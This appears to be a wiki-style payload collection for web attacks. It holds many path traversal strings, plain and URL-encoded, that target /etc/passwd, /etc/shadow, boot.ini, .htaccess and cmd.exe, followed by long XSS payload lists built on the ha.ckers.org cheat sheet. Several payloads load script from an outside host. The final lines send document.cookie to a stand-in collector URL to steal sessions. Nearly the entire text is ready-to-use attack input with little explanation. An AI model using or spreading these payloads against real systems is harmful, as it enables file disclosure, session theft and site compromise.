%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
../../../../../../../../../../../../etc/hosts%00<br />
../../../../../../../../../../../../etc/hosts<br />
../../boot.ini<br />
/../../../../../../../../%2A<br />
../../../../../../../../../../../../etc/passwd%00<br />
../../../../../../../../../../../../etc/passwd<br />
../../../../../../../../../../../../etc/shadow%00<br />
../../../../../../../../../../../../etc/shadow<br />
/../../../../../../../../../../etc/passwd^^<br />
/../../../../../../../../../../etc/shadow^^<br />
/../../../../../../../../../../etc/passwd<br />
/../../../../../../../../../../etc/shadow<br />
/./././././././././././etc/passwd<br />
/./././././././././././etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
/..\../..\../..\../..\../..\../..\../etc/passwd<br />
/..\../..\../..\../..\../..\../..\../etc/shadow<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
%0a/bin/cat%20/etc/passwd<br />
%0a/bin/cat%20/etc/shadow<br />
%00/etc/passwd%00<br />
%00/etc/shadow%00<br />
%00../../../../../../etc/passwd<br />
%00../../../../../../etc/shadow<br />
/../../../../../../../../../../../etc/passwd%00.jpg<br />
/../../../../../../../../../../../etc/passwd%00.html<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini<br />
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;<br />
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;<br />
../../../../../../../../conf/server.xml<br />
/../../../../../../../../bin/id|<br />
C:/inetpub/wwwroot/global.asa<br />
C:\inetpub\wwwroot\global.asa<br />
C:/boot.ini<br />
C:\boot.ini<br />
../../../../../../../../../../../../localstart.asp%00<br />
../../../../../../../../../../../../localstart.asp<br />
../../../../../../../../../../../../boot.ini%00<br />
../../../../../../../../../../../../boot.ini<br />
/./././././././././././boot.ini<br />
/../../../../../../../../../../../boot.ini%00<br />
/../../../../../../../../../../../boot.ini<br />
/..\../..\../..\../..\../..\../..\../boot.ini<br />
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini<br />
\..\..\..\..\..\..\..\..\..\..\boot.ini<br />
..\..\..\..\..\..\..\..\..\..\boot.ini%00<br />
..\..\..\..\..\..\..\..\..\..\boot.ini<br />
/../../../../../../../../../../../boot.ini%00.html<br />
/../../../../../../../../../../../boot.ini%00.jpg<br />
/.../.../.../.../.../<br />
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini<br />
</pre> <br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".'' <br />
<br />
=== XSS Discovery Statements ===<br />
<br />
Discovery Statements<br />
<pre># Discovery Statements (July 2007)<br />
# Statements used to cause exploitable errors<br />
# Foobar@email.de<br />
<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; <br />
'';!--"&lt;XSS&gt;=&amp;{()}<br />
</pre> <br />
<br />
Common exploit code <br />
<pre># Best Statements (July 2007)<br />
# Statements covering 90% of all vulnerabilities <br />
# Foobar@email.de<br />
<br />
'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='<br />
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="<br />
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'<br />
'); alert('xss'); var x='<br />
\\'); alert(\'xss\');var x=\'<br />
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));<br />
</pre><br />
<br />
Full List - (Update: 11 August 2009 - Total Statements: 162) <br />
<pre># Full List (July 2007)<br />
# All Statements - Full List <br />
# Based on the XSS cheat sheet <br />
# http://ha.ckers.org/xss.html<br />
# Foobar@email.de<br />
<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"<br />
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;<br />
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"<br />
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"<br />
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
"&lt;IMG SRC=""jav"<br />
"ascript:alert('XSS');""&gt;"<br />
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"<br />
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"<br />
"&lt;IMG SRC="" &amp;#14; javascript:alert('XSS');""&gt;"<br />
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"<br />
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;<br />
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS')"""<br />
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;<br />
"\"";alert('XSS');//"<br />
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"<br />
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
&lt;BODY ONLOAD=alert('XSS')&gt;<br />
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"<br />
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"<br />
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;<br />
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"<br />
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"<br />
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"<br />
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"<br />
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"<br />
¼script¾alert(¢XSS¢)¼/script¾<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"<br />
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"<br />
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"<br />
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"<br />
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"<br />
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"<br />
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"<br />
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"<br />
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"<br />
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"<br />
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"<br />
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;<br />
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"<br />
"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"<br />
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;<br />
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"<br />
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"<br />
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"<br />
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"<br />
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"<br />
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"<br />
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""h\ntt\tp://6"<br />
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;{document.write(""XSS-XSS-XSS"");};"<br />
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"<br />
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"<br />
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;div style=""behaviour: url([link to code]);""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt;"<br />
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"<br />
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"<br />
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"<br />
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"<br />
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"<br />
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"<br />
&gt;&lt;script&gt;<br />
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"<br />
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"<br />
&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;<br />
"%3cscript%3ealert(""WXSS"");%3c/script%3e"<br />
%3cscript%3ealert(document.cookie);%3c%2fscript%3e<br />
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E<br />
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;<br />
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert<br />
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;<br />
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""<br />
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;<br />
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;<br />
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"<br />
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG%20SRC='javasc<br />
"&lt;IMG%20SRC=""jav"<br />
"&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"<br />
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"<br />
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;<br />
&lt;IMG%20SRC=javascript:alert('XSS')&gt;<br />
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E<br />
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;<br />
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E<br />
